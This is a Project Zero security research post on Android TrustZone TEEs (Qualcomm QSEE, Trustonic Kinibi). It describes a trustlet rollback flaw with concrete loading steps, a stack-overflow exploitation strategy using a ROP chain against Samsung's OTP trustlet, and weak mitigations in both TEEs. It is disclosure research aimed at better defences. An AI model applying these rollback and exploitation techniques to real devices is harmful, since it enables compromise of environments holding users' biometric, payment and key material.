Trust Issues: Exploiting TrustZone TEEs

Google Project Zero - Mon, 07/24/2017 - 12:39
Posted by Gal Beniamini, Project Zero
Mobile devices are becoming an increasingly privacy-sensitive platform. Nowadays, devices process a wide range of personal and private information of a sensitive nature, such as biometric identifiers, payment data and cryptographic keys. Additionally, modern content protection schemes demand a high degree of confidentiality, requiring stricter guarantees than those offered by the “regular” operating system.
In response to these use-cases and more, mobile device manufacturers have opted for the creation of a “Trusted Execution Environment” (TEE), which can be used to safeguard the information processed within it. In the Android ecosystem, two major TEE implementations exist - Qualcomm’s QSEE and Trustonic’s Kinibi (formerly <t-base). Both of these implementations rely on ARM TrustZone security extensions in order to facilitate a small “secure” operating system, within which “Trusted Applications” (TAs) may be executed.
In this blog post we’ll explore the security properties of the two major TEEs present on Android devices. We’ll see how, despite their highly sensitive vantage point, these operating systems currently lag behind modern operating systems in terms of security mitigations and practices. Additionally, we’ll discover and exploit a major design issue which affects the security of most devices utilising both platforms. Lastly, we’ll see why the integrity of TEEs is crucial to the overall security of the device, making a case for the need to increase their defences.
Unfortunately, the design issue outlined in this blog post is difficult to address, and at times cannot be fixed without introducing additional dedicated hardware or performing operations that risk rendering devices unusable. As a result, most Qualcomm-based devices and all devices using Trustonic’s Kinibi TEE versions prior to 400 (that is, all Samsung Exynos devices other than the Galaxy S8 and S8 Plus) remain affected by this issue. We hope that by raising awareness to this issue we will help push for a more secure designs in the future.
I would like to note that while the current designs being reviewed may be incompatible with some devices’ use-cases, improved designs are being developed as a result of this research which may be accessible to a larger proportion of devices.TrustZone TEEs
TrustZone forms a hardware-based security architecture which provides security mechanisms both on the main application processor, as well as across the SoC. TrustZone facilitates the creation of two security contexts; the “Secure World” and the “Normal World”. Each physical processor is split into two virtual processors, one for each of the aforementioned contexts.
As its name implies, the “Secure World” must remain protected against any attacks launched by the “Normal World”. To do so, several security policies are enforced by hardware logic that prevents the “Normal World” from accessing the “Secure World”’s resources. What’s more, as the current security state is accessible on the system bus, peripherals on the SoC can be designated to either world by simply sampling this value.
TrustZone’s software model provides each world with its own copies of both lower privilege levels -- EL0 and EL1. This allows for the execution of different operating system kernels simultaneously - one running in the “Secure World” (S-EL1), while another runs in the “Normal World” (EL1). However, the world-split is not entirely symmetrical; for example, the hypervisor extensions (EL2) are not available in the “Secure World”.
*TOS: Trusted Operating System
On Android devices, TrustZone technology is used among other things to implement small “security-conscious” operating systems within which a set of trusted applications (TAs) may be executed. These TrustZone-based TEEs are proprietary components and are provided by the device’s manufacturers.
To put it in context - what we normally refer to as “Android” in our day to day lives is merely the code running in the “Normal World”; the Linux Kernel running at EL1 and the user-mode applications running at EL0. At the same time, the TEE runs in the “Secure World”; the TEE OS runs in the “Secure World”’s EL1 (S-EL1), whereas trusted applications run under S-EL0.
Within the Android ecosystem, two major TEE implementations exist; Qualcomm’s “QSEE” and Trustonic’s “Kinibi”. These operating systems run alongside Android and provide several key features to it. These features include access to biometric sensors, hardware-bound cryptographic operations, a “trusted user-interface” and much more.
Since the “Secure World”’s implementation is closely tied to the hardware of the device and the available security mechanisms on the SoC, the TEE OSs require support from and integration with the earlier parts of the device’s bootchain, as well as low-level components such as the bootloader.
Lastly, as can be seen in the schematic above, in order for the “Normal World” to be able to interact with the TEE and the applications within it, the authors of the TEE must also provide user-libraries, daemons and kernel drivers for the “Normal World”. These components are then utilised by the “Normal World” in order to communicate with the TEE.Exploring the TEEs
Like any other operating system, the security of a Trusted Execution Environment is hinged upon the integrity of both its trusted applications, and that of the TEE OS’s kernel itself. The interaction with the TEE’s kernel is mostly performed by the trusted applications running under it. As such, the logical first step to assessing the security of the TEEs would be to get a foothold within the TEE itself.
To do so, we’ll need to find a vulnerability in a trusted application and exploit it to gain code execution. While this may sound like a daunting task, remember that trusted applications are merely pieces of software that process user-supplied data. These applications aren’t written in memory safe languages, and are executed within opaque environments - a property which usually doesn’t lend itself well to security.  
Bearing all this in mind, how can we start analysing the trusted applications in either of these platforms? Recall that the implementations are proprietary, so even the file formats used to store the applications may not be public.
Indeed, in Qualcomm’s case the format used to store the applications was not documented until recently. Nonetheless, some attempts have been made to reverse engineer the format resulting in tools that allow converting the proprietary file format into a regular ELF file. Once an ELF file is produced, it can subsequently be analysed using any run-of-the-mill disassembler. What’s more, in a recent positive trend of increased transparency, Qualcomm has released official documentation detailing the file format in its entirety, allowing more robust research tools to be written as a result.
As for Trustonic, the trusted applications’ loadable format is documented within Trustonic’s publically available header files. This saves us quite some hassle. Additionally, some plugins are available to help load these applications into popular disassemblers such as IDA.

Now that we’ve acquired the tools needed to inspect the trusted applications, we can proceed on to the next step - acquiring the trustlet images (from a firmware image or from the device), converting them to a standard format, and loading them up in a disassembler.
However, before we do so, let’s take a moment to reflect on the trustlet model!Revisiting the Trustlet Model
To allow for increased flexibility, modern TEEs are designed to be modular, rather than monolithic chunks of code. Each TEE is designed as a “general-purpose” operating system, capable of loading arbitrary trustlets (conforming to some specification) and executing them within a “trusted environment”.  What we refer to as a TEE is the combination of the TEE’s operating system, as well as the applications running within it.
There are many advantages to this model. For starters, changes to a single trustlet only require updating the application’s binary on the filesystem, without necessitating any change in other components of the TEE. This also allows for the creation of a privilege separation model, providing certain privileges to some trustlets while denying them to others. Perhaps most importantly, this enables the TEE OS to enforce isolation between the trustlets themselves, thus limiting the potential damage done by a single malicious (or compromised) trustlet. Of course, while in principle these advantages are substantial, we’ll see later on how they actually map onto the TEEs in question.
Regardless, while the advantages of this model are quite clear, they are not completely free of charge. Recall, as we’ve mentioned above, that trusted applications are not invulnerable. Once vulnerabilities are found in these applications, they can be used to gain code execution within the TEE (in fact, we’ll write such an exploit later on!).
However, this begs the question - “How can trustlets be revoked once they’ve been found to be vulnerable?”. After all, simply fixing a vulnerability in a trustlet would be pointless if an attacker could load old vulnerable trustlets just as easily.
To answer this question, we’ll have to separately explore each TEE implementation. QSEE Revocation
As we’ve mentioned above, Qualcomm has recently released (excellent) documentation detailing the secure boot sequence on Qualcomm devices, including the mechanisms used for image authentication. As trusted applications running under QSEE are part of the same general architecture described in this document, we may gain key insights into the revocation process by reviewing the document.
Indeed, Qualcomm’s signed images are regular ELF files which are supplemented by a single special “Hash Table Segment”. This segment includes three distinct components: the SHA-256 digest of each ELF segment, a signature blob, and a certificate chain.

The signature is computed over the concatenated blob of SHA-256 hashes, using the private key corresponding to the last certificate in the embedded certificate chain. Moreover, the root certificate in the chain is validated against a “Root Key Hash” which is stored in the device’s ROM or fused into one-time-programmable memory on the SoC.
Reading through the document, we quickly come across the following relevant statement:
“The Attestation certificate used to verify the signature on this hash segment also includes additional fields that can bind restrictions to the signature (preventing “rolling back” to older versions of the software image, …”
Ah-ha! Well, let’s keep reading and see if we come across more pertinent information regarding the field in question.
Continuing our review of the document, it appears that Qualcomm has elected to add unique OU fields to the certificates in the embedded chain, denoting several attributes relating to the signature algorithm of the image being loaded. One such field of particular interest to our pursuits is the “SW_ID”. According to the document, this field is used to “bind the signature to a particular version of a particular software image”. Interesting!
The field is comprised of two concatenated values:

The document then goes on to explain:
“...If eFuse values indicated that the current version was ‘1’, then this image would fail verification. Version enforcement is done in order to prevent loading an older, perhaps vulnerable, version of the image that has a valid signature attached.”
At this point we have all the information we need. It appears that the subject of image revocation has not eluded Qualcomm -- we’re already off to a good start. However, there are a few more questions in need of an answer yet!
Let’s start by taking a single trustlet, say the Pixel’s Widevine trustlet, and inspecting the value of the SW_ID field encoded in its attestation certificate. As this is a DER-encoded X.509 certificate, we can parse it using “openssl”:

As we can see above, the IMAGE_ID value assigned to the Widevine trustlet is 0xC. But what about the other trustlets in the Pixel’s firmware? Inspecting them reveals a surprising fact -- all trustlets share the same image identifier.
More importantly, however, it appears that the version counter in the Widevine application on the Pixel is 0. Does this mean that no vulnerabilities or other security-relevant issues have been found in that trustlet since the device first shipped? That seems like a bit of a stretch. In order to get a better view of the current state of affairs, we need a little more data.
Luckily, I have a collection of firmware images that can be used for this exact purpose! The collection contains more than 45 different firmware images from many different vendors, including Google, Samsung, LG and Motorola. To collect the needed data, we can simply write a short script to extract the version counter from every trustlet in every firmware image. Running this script on the firmware collection would allow us to assess how many devices have used the trustlet revocation feature in the past to revoke any vulnerable trusted application (since their version counter would have to be larger than zero).
After running the script on my firmware collection, we are greeted with a surprising result: with the exception of a single firmware image, all trustlets in all firmware images contain version number 0.
Putting it all together, this would imply one of two things: either no bugs are ever found in any trustlet, or device manufacturers are failing to revoke vulnerable trustlets.
In fact, we already know the answer to this question. Last year I performed research into the Widevine trustlet as present on the Nexus 6 and found (and exploited) a vulnerability allowing arbitrary code execution within the TEE.
This same vulnerability was also present on a wide variety of other devices from different manufactures, some of whom are also a part of my firmware collection. Nonetheless, all of these devices in my collection (including the Nexus 6) did not revoke the vulnerable trustlet, and as such have remained vulnerable to this issue. While some devices (such as the Nexus 6) have shipped patched versions of the trustlet, simply providing a patched version without incrementing the version counter has no effect whatsoever.
While I do not have a sufficiently large firmware collection to perform a more in-depth analysis, previous assessments have been done regarding the amount of affected devices. Regardless, it remains unknown what proportion of these devices have correctly revoked the trustlet.
As it happens, exploiting the issue on “patched” devices is extremely straightforward, and does not require any more privileges than those required by the original version of the exploit. All an attacker would need to do is to place the old trustlet anywhere on the filesystem, and change the path of the trustlet in the exploit (a single string) to point at that new location (you can find example of such an exploit here).
One might be tempted to suggest several stop-gap mitigations, such as filtering the filesystem path from which trustlets are loaded to ensure that they only originate from the system partition (thus raising the bar for a would-be attacker). However, due to the design of the API used to load trustlets, it seems that filtering the filesystem path from which the trustlet is loaded is not feasible. This is since QSEECOM, the driver provided by Qualcomm to interact with QSEE, provides a simple API wherein it is only provided with a buffer containing the trustlet’s binary by user-space. This buffer is then passed on to TrustZone in order for the trustlet to be authenticated and subsequently loaded. Since the driver only receives a blob containing the trustlet itself, it has no “knowledge” of the filesystem path on which the trustlet is stored, making such verification of the filesystem path harder.
Of course, interaction with QSEECOM is restricted to several SELinux contexts. However, a non-exhaustive list of these includes the media server, DRM server, KeyStore, volume daemon, fingerprint daemon and more. Not a short list by any stretch…
So what about devices unaffected by the previously disclosed Widevine vulnerability? It is entirely possible that these devices are affected by other bugs; either still undiscovered, or simply not public. It would certainly be surprising if no bugs whatsoever have been found in any of the trustlets on these devices in the interim.
For example, diffing two versions of the Widevine trustlet in the Nexus 6P shows several modifications, including changes in functions related to key verification. Investigating these changes, however, would require a more in-depth analysis of Widevine and is beyond the scope of this blog post.

Putting all of the above together, it seems quite clear that device manufacturers are either unaware of the revocation features provided by Qualcomm, or are unable to use them for one reason or another.
In addition to the mechanism described above, additional capabilities are present in the case of trustlet revocation. Specifically, on devices where a replay protected memory block (RPMB) is available, it can be utilised to store the version numbers for trustlets, instead of relying on an eFuse. In this scenario, the APP_ID OU is used to uniquely identify each trusted application, allowing for a more fine-grained control over their revocation.
That being said, in order to leverage this feature, devices must be configured with a specific eFuse blown. Since we cannot easily query the status of eFuses on a large scale, it remains unknown what proportion of devices have indeed enabled this feature. Perhaps one explanation for the lack of revocation is that some devices are either lacking a RPMB, or have not blown the aforementioned eFuse in advance (blowing a fuse on a production device may be a risky operation).
What’s more, going over our firmware collection, it appears that some manufacturers have an incomplete understanding of the revocation feature. This is evidenced by the fact that several firmware images use the same APP_ID for many (and sometimes all) trusted applications, thus preventing the use of fine-grained revocation.
There are other challenges as well - for example, some vendors (such as Google) ship their devices with an unlocked bootloader. This allows users to freely load any firmware version onto the device and use it as they please. However, revoking trustlets would strip users of the ability to flash any firmware version, as once a trustlet is revoked, firmware versions containing trustlets from the previous versions would no longer pass the authentication (and would therefore fail to load). As of now, it seems that there is no good solution for this situation. Indeed, all Nexus and Pixel devices are shipped with an unlocked bootloader, and are therefore unable to make use of the trustlet revocation feature as present today.
One might be tempted once again to suggest naive solutions, such as embedding a whitelist of “allowed” trustlet hashes in the TEE OS’s kernel itself. Thus, when trustlets are loaded, they may also be verified against this list to ensure they are allowed by the current version TEE OS. This suggestion is not meritless, but is not robust either. For starters, this suggestion would require incrementing the version counter for the TEE OS’s image (otherwise attackers may rollback that binary as well). Therefore, this method suffers from some of the same drawbacks of the currently used approach (for starters, devices with an unlocked bootloader would be unable to utilise it). It should be noted, however, that rewriting the TEE OS’s image would generally require raw access to the filesystem, which is strictly more restrictive than the current permissions needed to carry out the attack.
Nonetheless, a better solution to this problem (rather than a stop-gap mitigation) is still needed. We hope that by underscoring all of these issues plaguing the current implementation of the revocation feature (leading to it being virtually unused for trustlet revocation), the conversation will shift towards alternate models of revocation that are more readily available to manufacturers. We also hope that device manufacturers that are able to use this feature, will be motivated to do so in the future.
Kinibi Revocation
Now, let’s set our sights on Trustonic’s Kinibi TEE. In our analysis, we’ll use the Samsung Galaxy S7 Edge (SM-G935F) - this is an Exynos-based device running Trustonic’s TEE version 310B. As we’ve already disclosed an Android privilege escalation vulnerability a few months ago, we can use that vulnerability in order to get elevated code execution with the “system_server” process on Android. This allows us greater freedom in exploring the mechanisms used in the “Normal World” related to Trustonic’s TEE.
Unfortunately, unlike Qualcomm, no documentation is available for the image authentication process carried out by Trustonic’s TEE. Be that as it may, we can still start our research by inspecting the trustlet images themselves. If we can account for every single piece of data stored in the trustlet binary, we should be able to identify the location of any version counter (assuming, of course, such a counter exists).
As we’ve mentioned before, the format used by trusted applications in Trustonic’s TEE is documented in their public header files. In fact, the format itself is called the “MobiCore Loadable Format” (MCLF), and harkens back to G&D’s MobiCore TEE, from which Trustonic’s TEE has evolved.
Using the header files and inspecting the binary in tandem, we can piece together the entire format to store the trustlet’s metadata as well as its code and data segments. As a result, we arrive at the following layout:

At this point, we have accounted for all but a single blob in the trustlet’s binary - indeed, as shown in the image above, following the data segment, there appears to be an opaque blob of some sort. It would stand to reason that this blob would represent the trustlet’s signature (as otherwise that would imply that unsigned trusted applications could be loaded into the TEE). However, since we’d like to make sure that all bits are accounted for, we’ll need to dig deeper and make sure that is the case.
Unfortunately, there appear to be no references in the header files to a blob of this kind. With that in mind, how can we make sure that this is indeed the trustlet’s signature? To do so we’ll need to reverse engineer the loading code within the TEE OS responsible for authenticating and loading trusted applications. Once we identify the relevant code, we should be able to isolate the handling of the signature blob and deduce its format.
At this point, however, this is easier said than done. We still have no knowledge of where the TEE OS’s binary is stored, how it may be extracted, and what code is responsible for loading it into place. However, some related work has been done in the past. Specifically, Fernand Lone Sang of Quarkslab has published a two-part article on reverse-engineering Samsung’s SBOOT on the Galaxy S6. While his work is focused on analysing the code running in EL3 (which is based on ARM’s Trusted Firmware), we’re interested in dissecting the code running in S-EL1 (namely, the TEE OS).
By applying the same methodology described by Fernand, we can load the SBOOT binary from an extracted firmware image into IDA and begin analysing it. Since SBOOT is based on ARM’s Trusted Firmware architecture, all we’d need to do is follow the logic up to the point at which the TEE OS is loaded by the bootloader. This component is also referred to as “BL32” in the ARM Trusted Firmware terminology.

After reversing the relevant code flows, we finally find the location of the TEE OS’s kernel binary embedded within the SBOOT image! In the interest of brevity, we won’t include the entire process here. However, anyone wishing to extract the binary for themselves and analyse it can simply search for the string “VERSION_-+A0”, which denotes the beginning of the TEE OS’s kernel image. As for the image’s base address - by inspecting the absolute branches and the address of the VBAR in the kernel we can deduce that it is loaded into virtual address 0x7F00000.
Alternatively, there exists another (perhaps much easier) way to inspect Kinibi’s kernel. It is a well known fact that Qualcomm supports the execution of not one, but two TEEs simultaneously. Samsung devices based on Qualcomm’s SoCs make use of this feature by loading both QSEE and Kinibi at the same time. This allows Samsung to access features from both TEEs on the same device. However, we’ve already seen how images loaded by Qualcomm’s image authentication module can be converted into regular ELF files (and subsequently analysed). Therefore, we can simply apply the same process to convert Kinibi’s kernel (“tbase”, as present on Samsung’s Qualcomm-based devices) into an ELF file which can then be readily analysed.
Since the file format of trusted applications running under Kinibi TEE on Qualcomm devices appears identical to the one used on Exynos, that would suggest that whatever authentication code is present in one, is also present in the other.
After some reversing, we identify the relevant logic responsible for authenticating trusted applications being loaded into Kinibi. The microkernel first verifies the arguments in the MCLF header, such as its “magic” value (“MCLF”). Next, it inspects the “service type” of the image being loaded. By following the code’s flow we arrive at the function used to authenticate both system trustlets and drivers - just what we’re after! After analysing this function’s logic, we finally arrive at the structure of the signature blob:

The function extracts the public key information (the modulus and the public exponent). Then, it calculates the SHA-256 digest of the public key and ensures that it matches the public key hash embedded in the kernel’s binary. If so, it uses the extracted public key together with the embedded signature in the blob to verify the signature on the trustlet itself (which is performed on its entire contents up to the signature blob). If the verification succeeds, the trustlet is loaded.
At long last, we are finally able to account for every single bit in the trustlet. But… Something appears to be amiss - where is the version counter located? Out of the entire trustlet’s binary, there is but a single value which may serve this purpose -- the “Service Version” field in the MCLF header. However, it certainly doesn’t seem like this value is being used by the loading logic we traced just a short while ago. Nevertheless, it’s possible that we’ve simply missed some relevant code.
Regardless, we can check whether any revocation using this field is taking place in practice by leveraging our firmware collection once again! Let’s write a short script to extract the service version field from every trusted application and run it against the firmware repository…
...And the results are in! Every single trusted application in my firmware repository appears to use the same version value - “0”. While there are some drivers that use a different value, it appears to be consistent across devices and firmware versions (and therefore doesn’t seem to represent a value used for incremental versions or for revocation). All in all, it certainly seems as though no revocation it taking place.
But that’s still not enough quite enough. To ensure that no revocation is performed, we’ll need to try it out for ourselves by loading a trustlet from an old firmware version into a more recent version.
To do so, we’ll need to gain some insight into the user-mode infrastructure provided by Trustonic. Let’s follow the execution flow through the process of loading a trustlet - starting at the “Normal World” and ending in the “Secure World”’s TEE. Doing so will help us figure out which user-mode components we’ll need to interact with in order to load our own trustlet.
When a privileged user-mode process wishes to load a trusted application, they do so by sending a request to a special daemon provided by Trustonic - “mcDriverDaemon”. This daemon allows clients to issue requests to the TEE (which are then routed to Trustonic’s TEE driver). One such command can be used to load a trustlet into the TEE.
The daemon may load trustlets from one of two paths - either from the system partition ("/system/app/mcRegistry"), or from the data partition ("/data/app/mcRegistry"). Since in our case we would like to avoid modifying the system partition, we will simply place our binary in the latter path (which has an SELinux context of “apk_data_file”).
While the load request itself issued to the daemon specifies the UUID of the trustlet to be loaded, the daemon only uses the UUID to locate the binary, but does not ensure that the given UUID matches the one encoded in the trustlet's header. Therefore, it’s possible to load any trustlet (regardless of UUID) by placing a binary with an arbitrary UUID (e.g., 07050501000000000000000000000020) in the data partition's registry directory, and subsequently sending a load request with the same UUID to the daemon.

Lastly, the communication with the daemon is done via a UNIX domain socket. The socket has an SELinux context which limits the number of processes that can connect to it. Nonetheless, much like in Qualcomm’s case, the list of such processes seems to include the majority of privileged processes running on the system. Indeed, a very partial list of which includes the DRM server, system server, the volume daemon, mediaserver and indeed any system application (you can find the full list in the issue tracker).
From then on, the daemon simply contacts Trustonic’s driver and issues a specific set of ioctls which cause it to pass on request to the TEE. It should be noted that access to the driver is also available to quite a wide range of processes (once again, the full list can be seen in the issue tracker).
Now that we’re sufficiently informed about the loading process, we can go ahead and attempt to load an old trustlet. Let’s simply take an old version of the “fingerprint” trustlet and place it into the registry directory under the data partition. After issuing a load request to the daemon and following the dmesg output, we are greeted with the following result:

There we have it -- the trustlet has been successfully loaded into the TEE, confirming our suspicions!
After contacting Samsung regarding this issue, we’ve received the following official response:
“Latest Trustonic kinibi 400 family now supports rollback prevention feature for trustlets and this is fully supported since Galaxy S8/S8+ devices”
Indeed, it appears that the issue has been addressed in the newest version on Trustonic’s TEE - Kinibi 400. Simply searching for relevant strings in the TEE OS binary provided in the Galaxy S8’s firmware reveals some possible hints as to the underlying implementation:

Based on these strings alone, it appears that newer devices utilise a replay protected memory block (RPMB) in order to prevent old trustlets from being rolled back. As the implementation is proprietary, more research is needed in order to determine how this feature is implemented.
With regards to Samsung devices - although revocation appears to be supported in the Galaxy S8 and S8 Plus, all other Exynos-based devices remain vulnerable to this issue. In fact, in the next part we’ll write an exploit for a TEE vulnerability. As it happens, this same vulnerability is present in several different devices, including the Galaxy S7 Edge and Galaxy S6.
Without specialised hardware used to store the version counter or some other identifier which can be utilised to prevent rollback, it seems like there is not much that can be done to address the issue in older devices. Nonetheless, as we have no visibility into the actual security components on the SoC, it is not clear whether a fix is indeed not possible. Perhaps other hardware components could be co-opted to implement some form of revocation prevention. We remain hopeful that a stop-gap mitigation may be implemented in the future.Deciding On A Target
To make matters more interesting, let’s try and identify an “old” vulnerable trustlet (one which has already been “patched” in previous versions). Once we find such a trustlet, we could simply insert it into the registry and load it into the TEE. As it happens, finding such trustlets is rather straightforward - all we have to do is compare the trustlets from the most recent firmware version with the ones in the first version released for a specific device -- if there have been any security-relevant fixes, we should be able to track them down.
In addition, we may also be able to use vulnerable trustlets from a different device. This would succeed only if both devices share the same “trusted” public key hash embedded in the TEE OS. To investigate whether such scenarios exist, I’ve written another script which extracts the modulus from each trustlet binary, and group together different firmware versions and devices that share the same signing key. After running this script it appears that both the Galaxy S7 Edge (G935F) and the Galaxy S7 (G930F) use the same signing key. As a result, attackers can load trustlets from either device into the other (therefore expanding the list of possible vulnerable trustlets that can be leveraged to attack the TEE).
After comparing a few trusted applications against their older versions, it is immediately evident that there’s a substantial number of security-relevant fixes. For example, a cursory comparison between the two versions of the the “CCM” trustlet (FFFFFFFF000000000000000000000012), revealed four added bound-checks which appear to be security-relevant.

Alternately, we can draw upon previous research. Last year, while doing some cursory research into the trusted applications available on Samsung’s Exynos devices, I discovered a couple of trivial vulnerabilities in the “OTP” trustlet running under that platform. These vulnerabilities have since been “fixed”, but as the trustlets are not revoked, we can still freely exploit them.
In fact, let’s do just that.Writing A Quick Exploit
We’ve already determined that old trustlets can be freely loaded into Kinibi TEE (prior to version 400). To demonstrate the severity of this issue, we’ll exploit one of two vulnerabilities I’ve discovered in the OTP trustlet late last year. Although the vulnerability has been “patched”, attackers can simply follow the steps above to load the old version of the trustlet into the TEE and exploit it freely.  
The issue we’re going to exploit is a simple stack-overflow. You might rightly assume that a stack overflow would be mitigated against by modern exploit mitigations. However, looking at the binary it appears that no such mitigation is present! As we’ll see later on, this isn’t the only mitigation currently missing from Kinibi.
Getting back to the issue at hand, let’s start by understanding the primitive at our disposal. The OTP trustlet allows users to generate OTP tokens using embedded keys that are “bound” to the TrustZone application. Like most other trusted applications, its code generally consists of a simple loop which waits for notifications from the TEE OS informing it of an incoming command.
Once a command is issued by a user in the “Normal World”, the TEE OS notifies the trusted application, which subsequently processes the incoming data using the “process_cmd” function. Reversing this function we can see the trustlet supports many different commands. Each command is assigned a 32-bit “command ID”, which is placed at the beginning of the user’s input buffer.
Following the code for these commands, it is quickly apparent that many them use a common utility function, “otp_unwrap”, in order to take a user-provided OTP token and decrypt it using the TEE’s TrustZone-bound unwrapping mechanism
This function receives several arguments, including the length of the buffer to be unwrapped. However, it appears that in most call-sites, the length argument is taken from a user-controlled portion of the input buffer, with no validation whatsoever. As the buffer is first copied into a stack-allocated buffer, this allows us to simply overwrite the stack frame with controlled content. To illustrate the issue, let’s take a look at the placement of items in the buffer for a valid unwrap command, versus their location on the stack when copied by “otp_unwrap”:

As we’ve mentioned, the “Token Length” field is not validated and is entirely attacker-controlled. Supplying an arbitrarily large value will therefore result in a stack overflow. All that’s left now is to decide on a stack alignment using which we can overwrite the return address at the end of the stack frame and hijack the control flow. For the sake of convenience, let’s simply return directly from “otp_unwrap” to the main processing function - “process_cmd”. To do so, we’ll overwrite all the stack frames in-between the two functions.
As an added bonus, this allows us to utilise the stack space available between the two stack frames for the ROP of our choice. Choosing to be conservative once again, we’ll elect to write a ROP chain that simply prepares the arguments for a function, executes it, and returns the return value back to “process_cmd”. That way, we gain a powerful “execute-function-in-TEE” primitive, allowing us to effectively run arbitrary code within the TEE. Any read or write operations can be delegated to read and write gadgets, respectively - allowing us to interact with the TEE’s address space. As for interactions with the TEE OS itself (such as system calls), we can directly invoke any function in the trusted application’s address space as if it were our own, using the aforementioned “execution-function” primitive.
Lastly, it’s worth mentioning that the stack frames in the trusted application are huge. In fact, they’re so big that there’s no need for a stack pivot in order to fit our ROP chain in memory (which is just as well, as a short search for one yielded no obvious results). Instead, we can simply store our chain on the stack frames leading from the vulnerable function all the way up to “process_cmd”.
Part of the reason for the exorbitantly large stack frames is the fact that most trusted applications do not initialise or use a heap for dynamic memory allocation. Instead, they rely solely on global data structures for stateful storage, and on the large stack for intermediate processing. Using the stack in such a way increases the odds of overflows occurring on the stack (rather than the non-existent heap). Recall that as there’s no stack cookie present, this means that many such issues are trivially exploitable.
Once we’ve finished mapping out the stack layout, we’re more-or-less ready to exploit the issue. All that’s left is to build a stack frame which overwrites the stored LR register to point at the beginning of our ROP chain’s gadgets, followed by a sequence of ROP gadgets needed to prepare arguments and call a function. Once we’re done, we can simply fill the rest of the remaining space with POP-sleds (that is, “POP {PC}” gadgets), until we reach “process_cmd”’s stack frame. Since that last frame restores all non-scratch registers, we don’t have to worry about restoring state either.

You can find the full exploit code here. Note that the code produces a position-independent binary blob which can be injected into a sufficiently privileged process, such as “system_server.Security Mitigations
We’ve already seen how a relatively straightforward vulnerability can be exploited within Kinibi’s TEE. Surprisingly, it appeared that there were few mitigations in place holding us back. This is no coincidence. In order to paint a more complete picture, let’s take a moment to assess the security mitigations provided by each TEE. We’ll perform our analysis by executing code within the TEE and exploring it from the vantage point of a trustlet. To do so, we’ll leverage our previously written code-execution exploits for each platform. Namely, this means we’ll explore Kinibi version 310B as present on the Galaxy S7 Edge, and QSEE as present on the Nexus 6.ASLR Kinibi offers no form of ASLR. In fact, all trustlets are loaded into a fixed address (denoted in the MCLF header). Moreover, as the trustlets’ base address is quite low (0x1000), this raises the probability of offset-from-NULL dereference issues being exploitable.
Additionally, each trustlet is provided with a common “helper” library (“mcLib”). This library acts as a shim which provides trusted applications with the stubs needed to call each of the functions supported by the TEE’s standard libraries. It contains a wealth of code, including gadgets to call functions, gadgets that invoke the TEE OS’s syscalls, perform message-passing and much more. And, unfortunately, this library is also mapped into a constant address in the virtual address space of each trustlet (0x7D01000).

Putting these two facts together, this means that any vulnerability found within a trustlet running under Trustonic’s TEE can therefore be exploited without requiring prior information about the address-space of the trustlet (thus lowering the bar for remotely exploitable bugs).
So what about Qualcomm’s TEE? Well, QSEE does indeed provide a form of ASLR for all trustlets. However, it is far from ideal - in fact, instead of utilising the entire virtual address space, each trustlet’s VAS simply consists of a flat mapping of a small segment of physical memory into which it is loaded.
Indeed, all QSEE trustlets are loaded into the same small physically contiguous range of memory carved out of the device’s main memory. This region (referred to as the “secapp-region” in the device tree) is dedicated to the TEE, and protected against accesses from the “Normal World” by utilising special security hardware on the SoC. Consequently, the larger the “secapp” region, the less memory is available to the “Normal World”.
The “secapp” region commonly spans around 100MB in size. Since, as we’ve noted before, QSEE trustlets VAS consists of a flat mapping, this means that the amount of entropy offered by QSEE’s ASLR implementation is limited by the “secapp” region’s size. Therefore, while many devices can theoretically utilise a 64-bit virtual address space (allowing for high entropy ASLR), the ASLR enabled by QSEE is limited approximately 9 bits (therefore with 355 guesses, an attacker would have a 50% chance of correctly guessing the base address). This is further aided by the fact that whenever an illegal access occurs within the TEE, the TEE OS simply crashes the trustlet, allowing the attacker to reload it and attempt to guess the base address once again.

Stack Cookies and Guard Pages
What about other exploit mitigations? Well, one of the most common mitigations is the inclusion of a stack cookie - a unique value which can be used to detect instances of stack smashing and abort the program’s execution.
Analysing the trustlets present on Samsung’s devices and running under Trustonic’s TEE reveals that no such protection is present. As such, every stack buffer overflow in a trusted application can be trivially exploited by an attacker (as we’ve seen above) to gain code execution. This is in contrast to QSEE, whose trustlets include randomised pointer-sized stack cookies.
Lastly, what about protecting the mutable data segments available to each trustlet - such as the stack, heap and globals? Modern operating systems tend to protect these regions by delimiting them with “guard pages”, thus preventing attackers from using an overflow in one structure in order to corrupt the other.
However, Trustonic’s TEE seems to carve both the globals and the stack from the trustlet’s data segment, without providing any guard page inbetween. Furthermore, the stack is located at the end of the data segments, and global data structures are placed before it. This layout makes it ideal for an attacker to either overflow the stack into the globals, or vice-versa.
Identically, Qualcomm’s TEE does not provide guard pages between the globals, heap and stack - they are all simply carved out of the single data segment provided to the trustlet. As a result, overflows in any of these data structures can be used to target any of the others.

TEEs As A High Value Target
At this point, it is probably clear enough that compromising TEEs on Android seems like a relatively straightforward task. Since both TEEs lag behind in term of exploit mitigations, it appears that the bar for exploitability of vulnerabilities, once found, is rather low.
Additionally, as more and more trusted applications are added, finding a vulnerability in the first place is becoming an increasingly straightforward task. Indeed, simply listing the number of trusted applications on the Galaxy S8, we can see that it contains no fewer than 30 trustlets!

Be that as it may, one might rightly wonder what the possible implications of code-execution within the TEE are. After all, if compromising the TEE does not assist attackers in any way, there may be no reason to further secure it.
To answer this question, we’ll see how compromising the TEE can be incredibly powerful tool, allowing attackers to fully subvert the system in many cases.
In Qualcomm’s case, one of the system-calls provided by QSEE allows any trustlet to map in physical memory belonging to the “Normal World” as it pleases. As such, this means any compromise of a QSEE trustlet automatically implies a full compromise of Android as well. In fact, such an attack has been demonstrated in the past. Once code execution is gained in the context of a trustlet, it can scan the physical address space for the Linux Kernel, and once found can patch it in memory to introduce a backdoor.
And what of Trustonic’s TEE? Unlike QSEE’s model, trustlets are unable to map-in and modify physical memory. In fact, the security model used by Trustonic ensures that trustlets aren’t capable of doing much at all. Instead, in order to perform any meaningful operation, trustlets must send a request to the appropriate “driver”. This design is conducive to security, as it essentially forces attackers to either compromise the drivers themselves, or find a way to leverage their provided APIs for nefarious means. Moreover, as there aren’t as many drivers as there are trustlets, it would appear that auditing all the drivers in the TEE is indeed feasible.
Although trustlets aren’t granted different sets of “capabilities”, drivers can distinguish between the trusted applications requesting their services by using the caller’s UUID. Essentially, well-written drivers can verify that whichever application consumes their services is contained within a “whitelist”, thus minimising the exposed attack surface.
